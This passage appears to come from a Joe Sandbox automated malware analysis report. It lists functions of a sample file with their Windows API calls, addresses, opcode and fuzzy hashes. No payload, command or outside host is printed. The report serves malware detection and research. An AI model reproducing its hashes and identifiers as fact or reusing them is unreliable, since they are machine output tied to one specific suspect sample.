                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 2675159561-0
                                                                                • Opcode ID: 3ee3f0821d4aa422fcc167a86a03ad970e025b26fb48c1ee892f8cf9521627c9
                                                                                • Instruction ID: b96ae978a3731c92d57ccd551218f53b11690bb495e791fbe499184517b3aea6
                                                                                • Opcode Fuzzy Hash: 3ee3f0821d4aa422fcc167a86a03ad970e025b26fb48c1ee892f8cf9521627c9
                                                                                • Instruction Fuzzy Hash: 1A41E231200A05AFDB209F24C884BE9BBAAFF85325F14809AFD459F391C774AD45CBA0
                                                                                Function 0063CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0063DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0063CF22,?), ref: 0063DDFD
                                                                                  • Part of subcall function 0063DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0063CF22,?), ref: 0063DE16
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0063CF45
                                                                                • MoveFileW.KERNEL32(?,?), ref: 0063CF7F
                                                                                • _wcslen.LIBCMT ref: 0063D005
                                                                                • _wcslen.LIBCMT ref: 0063D01B
                                                                                • SHFileOperationW.SHELL32(?), ref: 0063D061
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                • String ID: \*.*
                                                                                • API String ID: 3164238972-1173974218
                                                                                • Opcode ID: c19cbae229a2243a985d9074e951009087e2c2ec1cbe6897e0187ea3f22caa52
                                                                                • Instruction ID: 170ae0a93c41b8ba0ff475ccd7b71f069a6652e05524a1bb57bd4d0a6c18da5e
                                                                                • Opcode Fuzzy Hash: c19cbae229a2243a985d9074e951009087e2c2ec1cbe6897e0187ea3f22caa52
                                                                                • Instruction Fuzzy Hash: 0F415775D452195FDF12EFA4D985AEEB7BAAF44340F0000EAE505EB241EB34A685CF90
                                                                                Function 00662DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00662E1C
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00662E4F
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00662E84
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00662EB6
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00662EE0
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00662EF1
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00662F0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 27f7186bf049e7bf18a36f22872fe7d23367088a82cc46e9b6593c3be652f677
                                                                                • Instruction ID: 16d2e1828092397ec0e5d10790f19f61bcad6a58db12af7a81f42f37dee1f1a6
                                                                                • Opcode Fuzzy Hash: 27f7186bf049e7bf18a36f22872fe7d23367088a82cc46e9b6593c3be652f677
                                                                                • Instruction Fuzzy Hash: 6E3115306449429FDB20DF59DC94FA537E2FB5A720F1411A5FA50CF2B1CBB2A840DB41
                                                                                Function 00637726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00637769
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0063778F
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00637792
                                                                                • SysAllocString.OLEAUT32(?), ref: 006377B0
                                                                                • SysFreeString.OLEAUT32(?), ref: 006377B9
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 006377DE
                                                                                • SysAllocString.OLEAUT32(?), ref: 006377EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 01de79182c631b1f0419ab42060a214715a699674cfe21d516cba894319edcc7
                                                                                • Instruction ID: 3609eac1b4b0ed9e08d80d7cd02bffb316af1f769f601687c37c6bd7dce0b47f
                                                                                • Opcode Fuzzy Hash: 01de79182c631b1f0419ab42060a214715a699674cfe21d516cba894319edcc7
                                                                                • Instruction Fuzzy Hash: 522192B6608619AFDB20DFA9CC88CFB77EEEB09764B048025F955DB250DA70DC41C7A0
                                                                                Function 006377FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00637842
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00637868
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0063786B
                                                                                • SysAllocString.OLEAUT32 ref: 0063788C
                                                                                • SysFreeString.OLEAUT32 ref: 00637895
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 006378AF
                                                                                • SysAllocString.OLEAUT32(?), ref: 006378BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: f0adfc8649db4bac3996170f97192ceee0ce18adc3a728177979a743b9122129
                                                                                • Instruction ID: 7fef09dd6ef4e9b0ebfe89e453f3c8ee4e0ebe390914db6a3561256f9a619208
                                                                                • Opcode Fuzzy Hash: f0adfc8649db4bac3996170f97192ceee0ce18adc3a728177979a743b9122129
                                                                                • Instruction Fuzzy Hash: E021A171608605AFDB209FA9DC8CDBA77EDEB09360B108135F955DB2A1DA70EC41CBA4
                                                                                Function 006404D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 006404F2
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0064052E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: 5af24e4926f43861b8bd3301fa40e19e6e2d3279819094787c14456840e4f69d
                                                                                • Instruction ID: e04efa2128c2032bc3d1a05d1f263f650753f118878d02ca2c5c393369d9e272
                                                                                • Opcode Fuzzy Hash: 5af24e4926f43861b8bd3301fa40e19e6e2d3279819094787c14456840e4f69d
                                                                                • Instruction Fuzzy Hash: 7F217475500315DFEF249F29DD44A9A7BB6EF45724F204A19F9A1D72E0D7709940CF20
                                                                                Function 006405A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 006405C6
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00640601
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: 63fe67f39758443406763b58b756d1b4ff1ffad03f4f87469c53735482f83915
                                                                                • Instruction ID: 83c116931461905c17f8076d07d72e208536a70155cb1d246d2b87074db86764
                                                                                • Opcode Fuzzy Hash: 63fe67f39758443406763b58b756d1b4ff1ffad03f4f87469c53735482f83915
                                                                                • Instruction Fuzzy Hash: 402197755003259BEB209F69CC04A9A77EABF95730F214A1DFEA2E73D0D7B09951CB10
                                                                                Function 006640AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 005D604C
                                                                                  • Part of subcall function 005D600E: GetStockObject.GDI32(00000011), ref: 005D6060
                                                                                  • Part of subcall function 005D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 005D606A
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00664112
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0066411F
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0066412A
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00664139
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00664145
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: 4f76691034b8dffd1f9910b86d403f20d6c31d8cb0c8bd8f366551886ef3a8f0
                                                                                • Instruction ID: 1d53ac64e09bfd8a871272263e365bc18d40372202dc3001e166a5fd5848e1ec
                                                                                • Opcode Fuzzy Hash: 4f76691034b8dffd1f9910b86d403f20d6c31d8cb0c8bd8f366551886ef3a8f0
                                                                                • Instruction Fuzzy Hash: E611E2B214021ABEEF109F64CC85EE77F6EEF093A8F004111FB18A2150CA729C61DBA4
                                                                                Function 0060D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0060D7A3: _free.LIBCMT ref: 0060D7CC
                                                                                • _free.LIBCMT ref: 0060D82D
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 0060D838
                                                                                • _free.LIBCMT ref: 0060D843
                                                                                • _free.LIBCMT ref: 0060D897
                                                                                • _free.LIBCMT ref: 0060D8A2
                                                                                • _free.LIBCMT ref: 0060D8AD
                                                                                • _free.LIBCMT ref: 0060D8B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                • Instruction ID: bf27d3cbd510fc234f9994b3cced58e768c10a32bcf6446aed7618c98acfa097
                                                                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                • Instruction Fuzzy Hash: 64117C715C0B04AAD6A5BFF0CC0BFCB7BDEAF40B00F400D2DB299A60D2DA24F5058664
                                                                                Function 0063DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0063DA74
                                                                                • LoadStringW.USER32(00000000), ref: 0063DA7B
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0063DA91
                                                                                • LoadStringW.USER32(00000000), ref: 0063DA98
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0063DADC
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 0063DAB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 4072794657-3128320259
                                                                                • Opcode ID: bf33f5f70902ecd5535666be63bbea8909d3a31e95eec132eb31a5c00435eea2
                                                                                • Instruction ID: 484ec9bd4489a6691f71381fe4b35005236d3f33a14996bfcdeb9c25d6d64121
                                                                                • Opcode Fuzzy Hash: bf33f5f70902ecd5535666be63bbea8909d3a31e95eec132eb31a5c00435eea2
                                                                                • Instruction Fuzzy Hash: 960186F29002087FE7109BA4DD89EF7776DEB08711F405496F746E2141E6B49E844FB4
                                                                                Function 0064096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(01A2D970,01A2D970), ref: 0064097B
                                                                                • EnterCriticalSection.KERNEL32(01A2D950,00000000), ref: 0064098D
                                                                                • TerminateThread.KERNEL32(00540050,000001F6), ref: 0064099B
                                                                                • WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 006409A9
                                                                                • CloseHandle.KERNEL32(00540050), ref: 006409B8
                                                                                • InterlockedExchange.KERNEL32(01A2D970,000001F6), ref: 006409C8
                                                                                • LeaveCriticalSection.KERNEL32(01A2D950), ref: 006409CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: 497ad5f7bddf3a3a0d8e786f9a9853f717a71ee28fec9b1868fcab2ec373029b
                                                                                • Instruction ID: 4973f09f1d9045aaadd52d7c2e3e4aad88ef2507802fdf21625e10aee5af7b5a
                                                                                • Opcode Fuzzy Hash: 497ad5f7bddf3a3a0d8e786f9a9853f717a71ee28fec9b1868fcab2ec373029b
                                                                                • Instruction Fuzzy Hash: 9DF03131442D12BBE7415FA5EE9CBE6BB3AFF01712F403015F241508A0C7B5A565DFA0
                                                                                Function 00651C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00651DC0
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00651DE1
                                                                                • WSAGetLastError.WSOCK32 ref: 00651DF2
                                                                                • htons.WSOCK32(?), ref: 00651EDB
                                                                                • inet_ntoa.WSOCK32(?), ref: 00651E8C
                                                                                  • Part of subcall function 006339E8: _strlen.LIBCMT ref: 006339F2
                                                                                  • Part of subcall function 00653224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0064EC0C), ref: 00653240
                                                                                • _strlen.LIBCMT ref: 00651F35
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                • String ID:
                                                                                • API String ID: 3203458085-0
                                                                                • Opcode ID: cca45733570ee1748eb45c4c79736413d96d7667356e8081f1050d642ea9b30a
                                                                                • Instruction ID: 2206a73e478aa115bd7841e7721e27dacefba9143b6f053a0bc0de4c9d0f830a
                                                                                • Opcode Fuzzy Hash: cca45733570ee1748eb45c4c79736413d96d7667356e8081f1050d642ea9b30a
                                                                                • Instruction Fuzzy Hash: D4B1BA30204341AFC324DB24C885F6A7BE6AF85318F54894DF8564F3A2DB71ED46CB91
                                                                                Function 006001B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 006000BA
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006000D6
                                                                                • __allrem.LIBCMT ref: 006000ED
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0060010B
                                                                                • __allrem.LIBCMT ref: 00600122
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00600140
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                • Instruction ID: 75884bab3b8c0e8edf4ec04036ed9f4b2f71239090f7065925f4a2141c12f4ba
                                                                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                • Instruction Fuzzy Hash: DB813772A40B069FE7289F68CC41BAB77EAAF41324F24453EF611D76C1E774D9408B94
                                                                                Function 006061FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005F82D9,005F82D9,?,?,?,0060644F,00000001,00000001,8BE85006), ref: 00606258
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0060644F,00000001,00000001,8BE85006,?,?,?), ref: 006062DE
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006063D8
                                                                                • __freea.LIBCMT ref: 006063E5
                                                                                  • Part of subcall function 00603820: RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                • __freea.LIBCMT ref: 006063EE
                                                                                • __freea.LIBCMT ref: 00606413
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: 21d3b4a9e16cebaeb8eedf801d85fff8d9a64886020311cb7ef4e77e57a8ef20
                                                                                • Instruction ID: 6d2943e95dfc5038bc7e044ba294043cd2c4d1d3a3885e5c0ad3ae736adde8fe
                                                                                • Opcode Fuzzy Hash: 21d3b4a9e16cebaeb8eedf801d85fff8d9a64886020311cb7ef4e77e57a8ef20
                                                                                • Instruction Fuzzy Hash: FF51B072640216ABDB2D8F64CC81EEF77ABEF44750F144629F805DA2C0EB34DD61C6A0
